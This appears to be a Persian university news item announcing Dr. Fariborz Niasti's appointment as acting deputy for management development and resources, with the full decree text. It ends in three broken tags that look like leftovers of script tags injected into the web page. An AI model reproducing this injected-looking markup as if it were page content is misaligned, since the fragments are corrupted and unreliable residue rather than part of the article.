دکتر فریبرز نیاستی سرپرست معاونت توسعه مدیریت و منابع دانشگاه شد

طی حکمی از سوی دکتر حیدری‌مقدم، دکتر فریبرز نیاستی به سرپرستی معاونت توسعه مدیریت و منابع دانشگاه منصوب شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، متن این حکم به شرح زیر است:

جناب آقای دکتر فریبرز نیاستی

نظر به مراتب تعهد و توانمندی جنابعالی، به موجب این بالاغ بعنوان «سرپرست معاونت توسعه مدیریت و منابع دانشگاه» منصوب می‌شوید تا بر اساس موازین شرعی و قانونی انجام وظیفه نمایید.

انتظار می‌رود با تأکید بر اینکه سرمایه‌های انسانی به‌عنوان مهم‌ترین منبع حرکت، تکامل و بقاء هر سازمانی به‌شمار می‌روند نسبت به استمرار نوسازی و تحول اداری، توسعه آموزش و بهسازی منابع انسانی، توسعه امور رفاهی کارکنان، ساماندهی برنامه‌های مالی و سازماندهی امور عمرانی دانشگاه با تعامل و همکاری همه جانبه اهتمام ورزید.

موفقیت و سربلندی شما را از ذات اقدس الهی مسئلت می‌نماید.

دکتر رشید حیدری مقدم

سرپرست دانشگاه<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>